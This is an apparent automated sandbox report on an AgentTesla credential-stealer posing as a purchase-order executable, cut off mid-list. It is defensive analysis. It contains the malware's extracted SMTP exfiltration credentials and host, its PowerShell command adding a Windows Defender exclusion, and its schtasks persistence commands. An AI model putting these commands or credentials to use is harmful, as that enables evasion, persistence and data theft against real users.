
Windows Analysis Report
Purchase order 450080088 proj. Allt Charnan.exe

Overview

General Information

Sample Name: Purchase order 450080088 proj. Allt Charnan.exe
Analysis ID: 626538
MD5: 152ef22896bf39197d210d40171e898a
SHA1: bdd88e03d9131d7f35e0bfadbed02010d231a1bd
SHA256: 5a3834895f08aff701a029275074d4ab47aff4951d6f75e8393b0a97cb8f6031
Tags: agenttesla, exe

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected AgentTesla
Yara detected AntiVM3
Multi AV Scanner detection for dropped file
Tries to steal Mail credentials (via file / registry access)
Initial sample is a PE file and has a suspicious name
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
.NET source code references suspicious native API functions
Modifies the hosts file
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains very large array initializations
Machine Learning detection for dropped file
Adds a directory exclusion to Windows Defender
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
Creates processes with suspicious names
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Detected TCP or UDP traffic on non-standard ports
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • Purchase order 450080088 proj. Allt Charnan.exe (PID: 6588 cmdline: "C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe" MD5: 152EF22896BF39197D210D40171E898A)
    • powershell.exe (PID: 6948 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NpPgfycY.exe" MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • schtasks.exe (PID: 6964 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NpPgfycY" /XML "C:\Users\user\AppData\Local\Temp\tmp86F3.tmp" MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 7064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • jVULYR.exe (PID: 7076 cmdline: "C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe" MD5: 152EF22896BF39197D210D40171E898A)
    • schtasks.exe (PID: 7060 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NpPgfycY" /XML "C:\Users\user\AppData\Local\Temp\tmpFBF4.tmp" MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 7132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • jVULYR.exe (PID: 6676 cmdline: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe MD5: 152EF22896BF39197D210D40171E898A)
  • jVULYR.exe (PID: 7100 cmdline: "C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe" MD5: 152EF22896BF39197D210D40171E898A)
    • schtasks.exe (PID: 6952 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NpPgfycY" /XML "C:\Users\user\AppData\Local\Temp\tmp2B32.tmp" MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 1260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • jVULYR.exe (PID: 5908 cmdline: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe MD5: 152EF22896BF39197D210D40171E898A)
  • cleanup

Malware Configuration

AgentTesla: {"Exfil Mode": "SMTP", "Username": "aborderias@transmase.com", "Password": "pass@111", "Host": "smtp.transmase.com"}

Source | Rule | Description | Author | Strings
00000000.00000002.289167000.0000000003F6F000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000000.00000002.289167000.0000000003F6F000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
00000019.00000000.352037043.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000019.00000000.352037043.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
00000019.00000002.517627144.0000000002D51000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
(58 entries in total; the remaining entries are not reproduced here)

Source | Rule | Description | Author | Strings
9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.4.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.4.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.4.unpack | MALWARE_Win_AgentTeslaV3 | AgentTeslaV3 infostealer payload | ditekSHen
  • 0x32bef:$s10: logins
  • 0x32656:$s11: credential
  • 0x2ec24:$g1: get_Clipboard
  • 0x2ec32:$g2: get_Keyboard
  • 0x2ec3f:$g3: get_Password
  • 0x2ff1c:$g4: get_CtrlKeyDown
  • 0x2ff2c:$g5: get_ShiftKeyDown
  • 0x2ff3d:$g6: get_AltKeyDown
25.2.jVULYR.exe.400000.0.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
25.2.jVULYR.exe.400000.0.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
(106 entries in total; the remaining entries are not reproduced here)

No Sigma rule has matched
No Snort rule has matched


                    AV Detection

Source: 29.0.jVULYR.exe.400000.4.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Username": "aborderias@transmase.com", "Password": "pass@111", "Host": "smtp.transmase.com"}
Source: Purchase order 450080088 proj. Allt Charnan.exe | Virustotal: Detection: 37%
Source: Purchase order 450080088 proj. Allt Charnan.exe | ReversingLabs: Detection: 61%
Source: C:\Users\user\AppData\Roaming\NpPgfycY.exe | ReversingLabs: Detection: 61%
Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe | ReversingLabs: Detection: 61%
Source: Purchase order 450080088 proj. Allt Charnan.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\NpPgfycY.exe | Joe Sandbox ML: detected
Source: 29.0.jVULYR.exe.400000.4.unpack | Avira: Label: TR/Spy.Gen8
Source: 9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.4.unpack | Avira: Label: TR/Spy.Gen8
Source: 25.2.jVULYR.exe.400000.0.unpack | Avira: Label: TR/Spy.Gen8
Source: 9.2.Purchase order 450080088 proj. Allt Charnan.exe.400000.0.unpack | Avira: Label: TR/Spy.Gen8
Source: 9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.10.unpack | Avira: Label: TR/Spy.Gen8
Source: 29.0.jVULYR.exe.400000.6.unpack | Avira: Label: TR/Spy.Gen8
Source: 9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.6.unpack | Avira: Label: TR/Spy.Gen8
Source: 9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.8.unpack | Avira: Label: TR/Spy.Gen8
Source: 29.2.jVULYR.exe.400000.0.unpack | Avira: Label: TR/Spy.Gen8
Source: 25.0.jVULYR.exe.400000.4.unpack | Avira: Label: TR/Spy.Gen8
Source: 25.0.jVULYR.exe.400000.6.unpack | Avira: Label: TR/Spy.Gen8
Source: 9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.12.unpack | Avira: Label: TR/Spy.Gen8
Source: 25.0.jVULYR.exe.400000.12.unpack | Avira: Label: TR/Spy.Gen8
Source: 25.0.jVULYR.exe.400000.8.unpack | Avira: Label: TR/Spy.Gen8
Source: 29.0.jVULYR.exe.400000.12.unpack | Avira: Label: TR/Spy.Gen8
Source: 29.0.jVULYR.exe.400000.8.unpack | Avira: Label: TR/Spy.Gen8
Source: 29.0.jVULYR.exe.400000.10.unpack | Avira: Label: TR/Spy.Gen8
Source: 25.0.jVULYR.exe.400000.10.unpack | Avira: Label: TR/Spy.Gen8
Source: Purchase order 450080088 proj. Allt Charnan.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
Source: Purchase order 450080088 proj. Allt Charnan.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                    Source: Binary string: SZArrayEnumera.pdb source: jVULYR.exe, jVULYR.exe, 00000019.00000000.348771513.00000000009B2000.00000002.00000001.01000000.00000009.sdmp, jVULYR.exe, 0000001D.00000000.371444039.0000000000822000.00000002.00000001.01000000.00000009.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, jVULYR.exe.9.dr, NpPgfycY.exe.0.dr
Source: global traffic | TCP traffic: 192.168.2.3:49747 -> 208.91.198.38:587
Source: global traffic | TCP traffic: 192.168.2.3:49752 -> 162.222.225.16:587
Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000009.00000002.517206947.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, jVULYR.exe, 00000019.00000002.517627144.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, jVULYR.exe, 0000001D.00000002.518604895.0000000002E11000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: jVULYR.exe, 0000001D.00000002.520269819.000000000316E000.00000004.00000800.00020000.00000000.sdmp, jVULYR.exe, 0000001D.00000003.480252697.0000000000D94000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://2FcFU77ZypH.org
Source: jVULYR.exe, 0000001D.00000002.518604895.0000000002E11000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
Source: jVULYR.exe, 0000001D.00000002.518604895.0000000002E11000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://TwQUlE.com
Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.244802747.0000000005E66000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://en.w
Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.291113070.00000000070F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://fontfabrik.com
Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.286211001.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, jVULYR.exe, 00000014.00000002.355635331.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, jVULYR.exe, 00000017.00000002.378427187.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000009.00000002.519099942.0000000002E27000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000009.00000002.519288235.0000000002E45000.00000004.00000800.00020000.00000000.sdmp, jVULYR.exe, 00000019.00000002.520008150.00000000030D7000.00000004.00000800.00020000.00000000.sdmp, jVULYR.exe, 00000019.00000002.519797643.00000000030B7000.00000004.00000800.00020000.00000000.sdmp, jVULYR.exe, 0000001D.00000002.520534688.000000000318E000.00000004.00000800.00020000.00000000.sdmp, jVULYR.exe, 0000001D.00000002.520325574.0000000003176000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://smtp.transmase.com
Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000009.00000002.519099942.0000000002E27000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000009.00000002.519288235.0000000002E45000.00000004.00000800.00020000.00000000.sdmp, jVULYR.exe, 00000019.00000002.520008150.00000000030D7000.00000004.00000800.00020000.00000000.sdmp, jVULYR.exe, 00000019.00000002.519797643.00000000030B7000.00000004.00000800.00020000.00000000.sdmp, jVULYR.exe, 0000001D.00000002.520534688.000000000318E000.00000004.00000800.00020000.00000000.sdmp, jVULYR.exe, 0000001D.00000002.520325574.0000000003176000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://us2.smtp.mailhostbox.com
Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.291113070.00000000070F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.291113070.00000000070F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.253513922.0000000005E67000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.253746294.0000000005E68000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.291113070.00000000070F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.291113070.00000000070F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.291113070.00000000070F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.291113070.00000000070F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.291113070.00000000070F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.291113070.00000000070F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.291113070.00000000070F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.291113070.00000000070F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.253513922.0000000005E67000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.253746294.0000000005E68000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com7
Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.253513922.0000000005E67000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.253746294.0000000005E68000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.comF
Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.284755099.0000000005E60000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.290951086.0000000005E60000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.259064063.0000000005E6A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.comaL
Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.253513922.0000000005E67000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.253746294.0000000005E68000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.comalic
Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.253513922.0000000005E67000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.253746294.0000000005E68000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.comals
Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.259064063.0000000005E6A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.comceu
Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.253513922.0000000005E67000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.253746294.0000000005E68000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.comcomd
Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.253513922.0000000005E67000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.253746294.0000000005E68000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.comh
Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.284755099.0000000005E60000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.290951086.0000000005E60000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.259064063.0000000005E6A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.comiona
Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.253513922.0000000005E67000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.253746294.0000000005E68000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.comituL
Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.284755099.0000000005E60000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.290951086.0000000005E60000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.259064063.0000000005E6A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.commS
Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.291113070.00000000070F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fonts.com
Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246623797.0000000005E68000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246680153.0000000005E67000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246509021.0000000005E67000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.291113070.00000000070F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.291113070.00000000070F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.291113070.00000000070F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246509021.0000000005E67000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn:
Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246623797.0000000005E68000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cnaiL
Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246680153.0000000005E67000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cne-d
Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246623797.0000000005E68000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246680153.0000000005E67000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cng
Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246680153.0000000005E67000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn~
Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.255349808.0000000005E98000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.255002822.0000000005E98000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.254913650.0000000005E98000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.255131346.0000000005E98000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.255062247.0000000005E98000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/
Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.291113070.00000000070F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.291113070.00000000070F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.291113070.00000000070F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.248653593.0000000005E6B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.248792641.0000000005E6B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.291113070.00000000070F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.248653593.0000000005E6B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.248792641.0000000005E6B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/E
Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.248653593.0000000005E6B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.248792641.0000000005E6B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/S
Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.248653593.0000000005E6B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.248792641.0000000005E6B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0-
Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.248653593.0000000005E6B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.248792641.0000000005E6B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/h
Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.248792641.0000000005E6B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.245457597.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.245996490.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246121234.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.245979867.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246836550.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246204069.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246070856.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.245007021.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.244404121.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.247306277.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.245690255.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.247535138.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.244343928.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.244364704.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246152019.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.247977281.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.244820676.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246915519.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.245783482.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.247726544.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246035883.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.245457597.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.245996490.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246121234.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.245979867.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246836550.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246204069.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246070856.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.245007021.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.244404121.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.247306277.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.245690255.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.247535138.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246152019.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.247977281.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 